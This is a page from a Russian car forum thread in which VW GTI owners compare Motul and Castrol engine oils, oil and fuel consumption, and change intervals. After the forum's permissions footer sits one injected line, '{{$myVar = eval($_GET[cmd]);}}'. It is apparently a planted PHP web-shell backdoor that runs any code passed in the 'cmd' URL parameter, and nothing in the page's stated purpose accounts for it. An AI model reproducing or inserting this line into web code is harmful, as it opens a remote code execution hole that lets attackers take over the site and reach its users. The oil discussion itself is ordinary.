+ Ответить в теме
Страница 2 из 12 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя
Показано с 11 по 20 из 112

Тема: Какое масло выбрать?


  1. #11
    GTI-Racing KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all Аватар для KOT
    Регистрация
    25.04.2010
    Откуда
    Москва, Красногорск
    Машина
    GTI V
    Сообщений
    1,784
    Цитата Сообщение от Pavlo Посмотреть сообщение
    У кастрола много заводов, как и у мобила, так что тут вопросов нет, может и финское быть, но у меня такого выхода не было, поэтому перешел на мотюль, остался очень доволен
    да я тоже хочу на мотюль перейти, пока не могу понять на какой лучше
    Скорость это смерть, а всему виной жажда скорости...

  2. #12
    GTI-Racing Palma is on a distinguished road Аватар для Palma
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    BMW F10
    Сообщений
    622
    мой машин с нова лился только 5w30 КастрЮль лонг лайф..
    5 тыс назад наконец решил поробовать Мотюль VW specific для FSI моторов которое.
    ценник был по дороже кастрюли но я просто понял что я делал не так все эти годы)))
    Честно сказать даже не предпологал.
    По фактам:
    1. Снизился расход масла на 1 л. как минимум ( на период 10 тыс км)
    2. Снизился расход бензина около 0,7-1л. точно! Был оооООчень удивлен(бенз всегда 98)
    3.мотор действительно стал стабильнее работать(даже ещё когда свечи были старые уже, сейчас на новых свечках ещё ровнее)

    После моих впечатлений и криков Ииххха, при разговоре с товарищем сказал что залил мотюль и оч рад и что был дураком что раньше не лил)

    Он имея слегка дотюненый 16кл двиг на 2109, сразу его заменил! И ФАКТ!!! У него просто в разы стала машина стабильней работать.!

    Теперь мы с ним стонем и поём)) Только Мотюль) Вот)))

  3. #13
    GTI-Racing TishONE is on a distinguished road Аватар для TishONE
    Регистрация
    20.07.2008
    Откуда
    MSK
    Машина
    vRS FL 2011 (Race Blue)
    Сообщений
    1,139
    Motul лей
    MK2 GTI EV - ПРОДАНА.
    Hyundai Sonata 2.0 - ПРОДАНА.
    MK4 GTI AUM - ПРОДАНА.
    Skoda Octavia vRS - ПРОДАНА.
    BMW 116i - ПРОДАНА.
    Land Rover Discovery 4 HSE - комфорт превыше всего)

  4. #14
    GTI-Racing Quizzus will become famous soon enough Аватар для Quizzus
    Регистрация
    03.10.2008
    Откуда
    Moscow
    Машина
    GTI EDITION 30
    Сообщений
    748
    Мотюль однозначно!

  5. #15
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    А у меня после того как я перешёл на Мотюль, который specific 504 00 507 00, расход масла только вырос. Ну а как вы подсчитываете расход бензина (средний) для меня и вовсе загадка. Хотя если жить где-нибудь на отшибе и ездить совсем без пробок, то ещё можно понаблюдать за динамикой изменения расхода... но в Москве это просто нереально сделать. Тут расход зависит от того на сколько загружен город пробками.

    Вернулся к Кастролу ЛЛ3 и масло стало поджираться не так активно.

    Если и есть смысл лить Мотюль, то не specific. Потому что это те же яйца, только в профиль.
    С уважением, Василий.

    My onboard video.

  6. #16
    GTI-Racing Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Аватар для Pavlo
    Регистрация
    16.07.2009
    Откуда
    Москва
    Машина
    Mk4 GTI '99, Passat CC DSG '11
    Сообщений
    1,073
    X-cess или X-Clean для турбовок, для атмо лучше X-max
    Golf IV GTI AGU Koni Sport Coils -40mm + KYB AGX; Borla Muffler Attack Sound; NeuSpeed Pulley Kit; Samco Cooling Kit; ACT Flywheels; Hotchkis Sway Bar; WhiteLine Front & Rear Busching; TD05HR 16G Turbo; Eagle H-Beam + JE Piston 8,5;
    Passat CC 1,8 TSI APRStage 1/2 Testpipe - Продано

  7. #17
    GTI-Racing Quizzus will become famous soon enough Аватар для Quizzus
    Регистрация
    03.10.2008
    Откуда
    Moscow
    Машина
    GTI EDITION 30
    Сообщений
    748
    Цитата Сообщение от VVZ Посмотреть сообщение
    А у меня после того как я перешёл на Мотюль, который specific 504 00 507 00, расход масла только вырос. Ну а как вы подсчитываете расход бензина (средний) для меня и вовсе загадка. Хотя если жить где-нибудь на отшибе и ездить совсем без пробок, то ещё можно понаблюдать за динамикой изменения расхода... но в Москве это просто нереально сделать. Тут расход зависит от того на сколько загружен город пробками.

    Вернулся к Кастролу ЛЛ3 и масло стало поджираться не так активно.

    Если и есть смысл лить Мотюль, то не specific. Потому что это те же яйца, только в профиль.
    Золотые слова! Я например про 300V скажу, что масло супер для отжига, но менять не позднее 7500 пробега.

  8. #18
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    Я лью X-Lite... Но пока ничего не могу сказать насчет его расхода, про бенз также....
    Посмотрим что будет дальше...
    Ну а мотор стал явно тише, и как то легче чтоли крутится...

    Добавлено через 2 минуты
    Цитата Сообщение от Quizzus Посмотреть сообщение
    Золотые слова! Я например про 300V скажу, что масло супер для отжига, но менять не позднее 7500 пробега.
    Если лить 300V я бы менял его через 3-5 тыс, в зависимости от того как часто мотор испытывал хорошие нагрузки... Я про выезды на трек в частности...
    Последний раз редактировалось Spaceman; 26.04.2011 в 17:11. Причина: Добавлено сообщение
    Golf V GTI Overload почти сток...

  9. #19
    GTI-Racing Евгений GTI is on a distinguished road Аватар для Евгений GTI
    Регистрация
    07.12.2010
    Откуда
    М.О
    Машина
    Golf 5 GTI
    Сообщений
    163
    Спасибо парни за советы. Думаю перейду на матюль, а там отпишусь че будет.

    Помогайте друг другу.

    Жека.

  10. #20
    GTI-Racing Palma is on a distinguished road Аватар для Palma
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    BMW F10
    Сообщений
    622
    Цитата Сообщение от VVZ Посмотреть сообщение
    А у меня после того как я перешёл на Мотюль, который specific 504 00 507 00, расход масла только вырос. Ну а как вы подсчитываете расход бензина (средний) для меня и вовсе загадка. Хотя если жить где-нибудь на отшибе и ездить совсем без пробок, то ещё можно понаблюдать за динамикой изменения расхода... но в Москве это просто нереально сделать. Тут расход зависит от того на сколько загружен город пробками.

    Вернулся к Кастролу ЛЛ3 и масло стало поджираться не так активно.

    Если и есть смысл лить Мотюль, то не specific. Потому что это те же яйца, только в профиль.
    Расход масла очевидно меньше, ранее я в интервале 10-12 тыс км покупал около 3 а иногда даже 4 х литров кастрола! ! ! это оч не мало!!
    Ща на мотюле ещё вторую литруху не использовал до конца! Ещё 0,5 литра!

    По расходу бенза скажу что я утром еду по мкаду оклло 50 км с Ленинградки до Рязанки и чаще всего возвращаюсь домой тоже по МКАД. расход у меня средний(если не ускоряться между рядов а сонно ехать в левом ряду с потоком(80-100 км\ч) около 7,5-8 л. на 100 км. на кастроле было минимум 8,6 в такое же время весной и осенью.
    А если еду на дачу то 6,8 - 7,2 ( 120 км, через Ярославское шоссе) По щелчку конечно около 9 выходит.!
    Если по городу целый день то средне 10,8-11,5 л\100км! До этого 12 иногда 13 точно выходило.
    Так что хз хз 504 507 оч понра!!! Хотя я пока другие масла Мотюль не пробывал.

+ Ответить в теме
Страница 2 из 12 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя

Похожие темы

  1. 1 ТО, какое масло лить?
    от Born Ali в разделе Golf 6
    Ответов: 59
    Последнее сообщение: 02.04.2024, 19:53
  2. Какое масло в ГТИ 6
    от Zews в разделе Golf 6
    Ответов: 25
    Последнее сообщение: 02.01.2024, 02:18
  3. Ответов: 27
    Последнее сообщение: 27.07.2013, 13:45
  4. TO-1 Какое масло лить
    от ADAC в разделе Golf R
    Ответов: 13
    Последнее сообщение: 02.08.2012, 22:51
  5. Кто Какое Масло Льет?
    от veteromska в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 4
    Последнее сообщение: 21.02.2009, 01:23

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}